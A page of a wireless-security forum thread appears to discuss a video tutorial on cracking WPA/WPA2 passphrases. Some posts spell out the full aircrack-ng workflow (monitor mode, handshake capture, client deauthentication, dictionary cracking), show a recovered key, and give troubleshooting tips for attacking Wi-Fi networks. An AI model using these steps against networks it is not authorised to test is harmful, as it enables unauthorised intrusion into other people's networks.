Page 4 of 36 FirstFirst ... 2345614 ... LastLast
Results 31 to 40 of 359

Thread: -=Xploitz=- VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"

  1. #31
    Member
    Join Date
    May 2007
    Posts
    138

    Default

    I have one, who's network are you pentesting?

    As balding parrot said, if it's your network then you control the client association process...so I don't understand how your capture file has got to 89Mb.

    No offence but there seems to be a lot of people here who are "pentesting" networks who don't seem to be that well versed in wireless pentesting...so I guess what I'm really saying is how do you all get these jobs because I can't find anyone to pay me to pentest their network, (not that I'd actually feel qualified to!)?

    Don't take that the wrong way, I'm not accusing anyone of wrong doing...just interested in making some spare cash

  2. #32
    Junior Member
    Join Date
    Jan 2010
    Posts
    53

    Default

    Quote Originally Posted by TrialAndError View Post
    ...so I don't understand how your capture file has got to 89Mb...
    Do you really think i have a 89mb big capture file ?
    Only statement i found in this thread about a 89mb file is that one where xploitz stated he doesn't have such a big one

    I don't understand your pentest statement, too .
    I just gave an example where potential big traffic may be eliminated using ivs.


    Somehow this thread turns in a direction it surely wasn't intended to go. I suggest further postings should return to topic. So keep up your fine tuts xploitz !

  3. #33
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    I can understand where your coming from thetom. If someone hired me to pentest their network, I'm sure there's the type of people out there that insist on it being done without their knowing of it happening. I for one would be such an individual. I wouldn't want to know when it was happening ONLY because I wouldn't want to be tempted to try to beef up my security before the test..and then I'd get a chance to see how good the pentester and my security really is/was.

    But as far as days worth of data that doesn't contain a handshake?? Maybe the owner forgot their key and can't connect themselves..lol..and doesn't know about the reset button on the AP/Router??(lol ) Maybe then the owner of the AP would need to know the date of your pentest..so the situation of days worth of no handshake data wouldn't occur...I know a certain person that didn't know about the reset button..and it didn't help out with my laughter after finding out is was a woman...and yes,..lol..she was a blond..lol
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]

  4. #34
    Junior Member
    Join Date
    Jan 2010
    Posts
    53

    Default

    right you are. A correct pentest has to be done under real circumstances, except those one that might break vital Services.

    for my opionion there has now been enough said about handshake capturing


    About people not knowing "reset" button i have a some wordsto tell.
    A Friend of mine asks me to support him with his wlan problems.
    Via phone i asked him at first to restart his router and explained how to do this. After restart his notebook got a connection at once. A big yell to my ear showed his happiness. Especially with this "magic" solution. So i asked how long he had problems. He answeared four weeks.
    i have been a little amused and shocked together Can anybody here imagine to be four weeks offline because of not hitting restart button ?

    @edit : as usal some typos. i guess most have already found i'm not native english

  5. #35
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Red face

    This is gonna make me look very "no0bish" But remember,..this was my very first time with anything outside my direct connection with a wired PC. I never had anyone tell me this stuff and I just bought my first laptop..and thought that because i got a wireless laptop..I got automatic free internet connection. Seems that a lot of people think that just because they buy a wireless laptop..that they get free internet access anywhere in the world via a free satellite or something..I know I did..lol

    I went 4 hours without connection the very first time I bought a wireless router. I couldn't decide what type of encryption to put on it. I kept going from WEP to WPA2..back and fourth..then I read I needed a strong password...so i made up something like....xploitzconn3cti0n 1014 t3st. And guess what....I forgot what it was..and I couldn't even remember the password to my routers web page i changed from admin to something else. Then I read the instruction book..and it spoke of this "magic" reset button...and all my problems went away. True story.
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]

  6. #36

    Default Yes, it works

    *** i take no credit for this, i am just posting how i managed to crack my WPA thanks to Xploitz video ****
    After watching Xploitz video, i just had to try this for myself, now admittingly i didnt get it the first time, so i watched it over & over carefully & used the following commands

    airmon-ng stop ath0

    airmon-ng start wifi0

    airodump-ng ath0 <<<<-----this will give you a list of networks **control & c to stop dumping & type the next command ***

    airodump-ng -c 11 -w psk --bssid XX:XX:XX:XX:XX ath0

    new shell <------

    aireplay-ng -0 1 -a XX:XX:XX:XX:XX -c <A CLIENTS MAC ADDRESS THATS ALREADY CONNECTED TO THE NETWORK!> ath0

    Get your handshake...then Ctrl c to break out of airodump...
    aircrack-ng -w <dictionary name if in home folder..else the path to your dictionary.> psk*.cap

    i have 2 say this with GREAT gratitude..... you ARE "Moderator and Remote-Exploit.orgs Master Tutorialist".
    BECAUSE, of you YOU - i have managed to CRACK my router on WPA-PSK

    This worked for me WITHOUT FAIL 3 times
    I had a very weak passphrase "password" just to see how / if it would work & walla it does, so now i know how to do this & how easy it was, i'll be going Lockdown so nobody can try crack me

    Again & as always, many thanks to Xploitz for his brilliant video

  7. #37

    Default results

    ok, i ran this again just now - yesterday i had a really simple passphrase "password" - this cracked it in 00:00:00 seconds with aircrack-ng built in password.lst however, i didnt notice "password" listed when i done cat password.lst mmmm - anyways, i downloaded a small 7mb password list & put a different passphrase "security" (which is also a simple passphrase) on my router & it took a little longer, but non the less, cracked it, following Xploitz video - so i'll need to get my head around this & try get BT2 installed on my HDD & then & only then, look into trying Xploitz 4th video

    "HOW TO USE AIROLIB-NG WITH AIRCRACK-NG"

    below is the results of my wpa crack

    [00:13:20] 129346 keys tested (160.11 k/s)


    KEY FOUND! [ security ]


    Master Key : 99 00 C3 EA 17 FA 69 F2 90 9B 88 D5 DA 98 3D D2
    8B 58 8C 41 A9 DB F8 CD 7F 6F A8 D0 D7 82 D4 3F

    Transcient Key : 64 2F 11 84 F0 62 2D FF D7 A6 F8 23 08 85 F6 0B
    13 03 35 15 2A D8 68 4E 73 33 27 2B D3 88 AD 54
    2D A1 A3 E0 0F D4 64 71 8C 67 A6 AE BF D6 3C 36
    86 84 C5 82 FD FE 6D 38 46 66 8F 2F 12 0B 13 AE

    EAPOL HMAC : EF A6 53 B0 68 5B 0C 38 FC E0 E4 87 E4 1E EB 96

    bt ~ #

  8. #38
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    Quote Originally Posted by samsung View Post
    *** i take no credit for this, i am just posting how i managed to crack my WPA thanks to Xploitz video ****
    After watching Xploitz video, i just had to try this for myself, now admittingly i didnt get it the first time, so i watched it over & over carefully & used the following commands

    airmon-ng stop ath0

    airmon-ng start wifi0

    airodump-ng ath0 <<<<-----this will give you a list of networks **control & c to stop dumping & type the next command ***

    airodump-ng -c 11 -w psk --bssid XX:XX:XX:XX:XX ath0

    new shell <------

    aireplay-ng -0 1 -a XX:XX:XX:XX:XX -c <A CLIENTS MAC ADDRESS THATS ALREADY CONNECTED TO THE NETWORK!> ath0

    Get your handshake...then Ctrl c to break out of airodump...
    aircrack-ng -w <dictionary name if in home folder..else the path to your dictionary.> psk*.cap

    i have 2 say this with GREAT gratitude..... you ARE "Moderator and Remote-Exploit.orgs Master Tutorialist".
    BECAUSE, of you YOU - i have managed to CRACK my router on WPA-PSK

    This worked for me WITHOUT FAIL 3 times
    I had a very weak passphrase "password" just to see how / if it would work & walla it does, so now i know how to do this & how easy it was, i'll be going Lockdown so nobody can try crack me

    Again & as always, many thanks to Xploitz for his brilliant video

    You are 2 kind. I do try to live up to my signature. Have you transcribed all of my videos that you watched?? I might just make you my "Video Security Transcriptionist"


    Quote Originally Posted by samsung View Post
    ok, i ran this again just now - yesterday i had a really simple passphrase "password" - this cracked it in 00:00:00 seconds with aircrack-ng built in password.lst however, i didnt notice "password" listed when i done cat password.lst mmmm - anyways, i downloaded a small 7mb password list & put a different passphrase "security" (which is also a simple passphrase) on my router & it took a little longer, but non the less, cracked it, following Xploitz video - so i'll need to get my head around this & try get BT2 installed on my HDD & then & only then, look into trying Xploitz 4th video

    "HOW TO USE AIROLIB-NG WITH AIRCRACK-NG"

    below is the results of my wpa crack

    [00:13:20] 129346 keys tested (160.11 k/s)


    KEY FOUND! [ security ]
    Just imagine it saying this....

    [00::02] 129346 keys tested (55,000 k/s)

    Thats what airolib and aircrack can accomplish TOGETHER. Remember to pay VERY STRICT ATTENTION to that airolib video. Its a tricky one.

    Your going to basically use up SOME time making the databases...but only HALF as long........ VS using aircrack-ng as a stand alone. Say it takes you 60 minutes to go through a dictionary attack with aircrack-ng..

    aircrack-ng -w wordlist.lst psk*.cap

    it would take you only about 30-35 minutes to generate a pre-computed hash table with airolib with all of those passwords..but you have them salted with your essid as the kicker...and you can add essids to that with just a little bit extra time cause the database is already precomputed. Ask Shamanvirtuel....its really the way to go if you use large dictionaries regularly.
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]

  9. #39
    Junior Member
    Join Date
    Jun 2007
    Posts
    29

    Default [TKIP+PSK] no WPA Handshake

    Hi,
    I follow the video by Xploitz :
    -=Xploitz=- VIDEO: #3 "E-Z WPA/WPA2 Cracking Tutorial"
    -XploitxVideoE-ZWPAWPA2CrackingTuto.flv

    I have 1 station connected
    And ENC : WPA
    CLIPHER : TKIP
    AUTH : PSK
    ESSID : [name]

    I do :
    Code:
    aireplay-ng -0 1 -a BSSID AP -c BSSID CLIENT wlan0
    It writes :
    Code:
    Waiting for beacon fram (BSSID AP)
    Sending DeAuth to station -- STMAC [BSSID CLIENT]
    But i have no "WPA handshake" wrote in airodump-ng shell

    I don't know why.

    This :
    Code:
    aircrack-ng -w pass psk*.cap
    give an encryption : EAPOL+WEP (445 IVs)

    Thanks

  10. #40
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    Moving this post to my videos thread because I asked in that thread that if you had any questions to please post them there.

    First off...please list ALL of your commands EXACTLY from startup please. It's very important. And if you followed my video and used the same commands that I used...still take the time to post EVERY COMMAND YOU WROTE. Also what card and chipset are you using?? The number of IVS is pointless, since its NOT WEP..so ignore their values. Usually when you fail to get a handshake..its cause your not associated/authenticated..channel hopping..or just 2 far away. Remember..your trying to crack WPA/WPA2..not WEP. In WEP you only need to be close to the router / AP..but in cracking WPA/WPA2...you have to be close to BOTH client and AP/router. Hope this helps..and if not ...please post all info that I requested from you.
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]

Page 4 of 36 FirstFirst ... 2345614 ... LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •